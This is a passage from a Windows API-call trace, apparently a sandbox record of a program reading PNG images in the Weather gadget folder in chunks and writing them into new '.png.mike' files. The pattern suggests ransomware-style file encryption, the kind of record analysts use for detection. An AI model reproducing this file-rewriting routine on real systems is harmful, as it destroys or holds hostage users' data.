lpOverlapped=0x0 | out: lpBuffer=0x212b9a0*, lpNumberOfBytesWritten=0x2af074*=0x7d0, lpOverlapped=0x0) returned 1 [0134.816] CloseHandle (hObject=0x284) returned 1 [0134.816] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0134.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.816] GetFileType (hFile=0x284) returned 0x1 [0134.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0134.817] GetFileType (hFile=0x284) returned 0x1 [0134.818] WriteFile (in: hFile=0x284, lpBuffer=0x212ec24*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x212ec24*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0134.818] CloseHandle (hObject=0x284) returned 1 [0134.818] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.818] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.818] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a522a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x19a522a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x19a78400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x31f0)) returned 1 [0134.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.818] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.818] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.818] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2130524 | out: lpFileInformation=0x2130524*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a522a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x19a522a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x19a78400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x31f0)) returned 1 [0134.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.819] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.819] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", dwFileAttributes=0x80) returned 0 [0134.820] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.820] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0134.820] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a522a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x19a522a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x19a78400, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x31f0)) returned 1 [0134.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0134.820] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", lpFilePart=0x0) returned 0x62 [0134.820] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike", lpFilePart=0x0) returned 0x67 [0134.820] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike")) returned 1 [0134.822] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.822] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.822] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0134.823] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0134.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0134.824] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0134.824] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.824] GetFileType (hFile=0x284) returned 0x1 [0134.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0134.824] GetFileType (hFile=0x284) returned 0x1 [0134.824] CloseHandle (hObject=0x284) returned 1 [0134.824] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.824] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.824] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0134.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0134.825] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0134.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0134.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.825] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png"), fInfoLevelId=0x0, lpFileInformation=0x2133000 | out: lpFileInformation=0x2133000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbceedbce, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbceedbce, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde562dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3229)) returned 1 [0134.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.825] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0134.825] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png"), fInfoLevelId=0x0, lpFileInformation=0x2133380 | out: lpFileInformation=0x2133380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbceedbce, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbceedbce, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde562dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3229)) returned 1 [0134.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0134.825] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.825] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0134.825] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0134.825] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.825] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.826] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.826] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0134.826] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0134.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0134.826] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.826] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.826] GetFileType (hFile=0x284) returned 0x1 [0134.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.826] GetFileType (hFile=0x284) returned 0x1 [0134.826] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0134.827] WriteFile (in: hFile=0x284, lpBuffer=0x2134494*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2134494*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0134.827] CloseHandle (hObject=0x284) returned 1 [0134.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0134.828] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png"), fInfoLevelId=0x0, lpFileInformation=0x2133ef4 | out: lpFileInformation=0x2133ef4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbceedbce, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbceedbce, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbde562dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3229)) returned 1 [0134.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0134.828] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.828] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.828] GetFileType (hFile=0x284) returned 0x1 [0134.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.828] GetFileType (hFile=0x284) returned 0x1 [0134.828] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0134.828] ReadFile (in: hFile=0x284, lpBuffer=0x21355fc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21355fc*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0134.830] CloseHandle (hObject=0x284) returned 1 [0134.831] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.831] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.831] GetFileType (hFile=0x284) returned 0x1 [0134.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.831] GetFileType (hFile=0x284) returned 0x1 [0134.831] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0134.831] WriteFile (in: hFile=0x284, lpBuffer=0x213fb64*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x213fb64*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0134.832] CloseHandle (hObject=0x284) returned 1 [0134.832] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", lpFilePart=0x0) returned 0x5b [0134.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0134.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.832] GetFileType (hFile=0x284) returned 0x1 [0134.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0134.832] GetFileType (hFile=0x284) returned 0x1 [0134.832] SetFilePointer (in: hFile=0x284, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0134.832] ReadFile (in: hFile=0x284, lpBuffer=0x214263c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x214263c*, lpNumberOfBytesRead=0x2af080*=0xa29, lpOverlapped=0x0) returned 1 [0134.832] CloseHandle (hObject=0x284) returned 1 [0134.833] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0134.833] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0134.833] GetFileType (hFile=0x284) returned 0x1 [0134.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0134.833] GetFileType (hFile=0x284) returned 0x1 [0134.833] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0134.833] WriteFile (in: hFile=0x284, lpBuffer=0x214922c*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x214922c*, lpNumberOfBytesWritten=0x2af074*=0xa30, lpOverlapped=0x0) returned 1 [0134.834] CloseHandle (hObject=0x284) returned 1 [0134.834] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike", lpFilePart=0x0) returned 0x60 [0134.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0134.834] CreateFileW 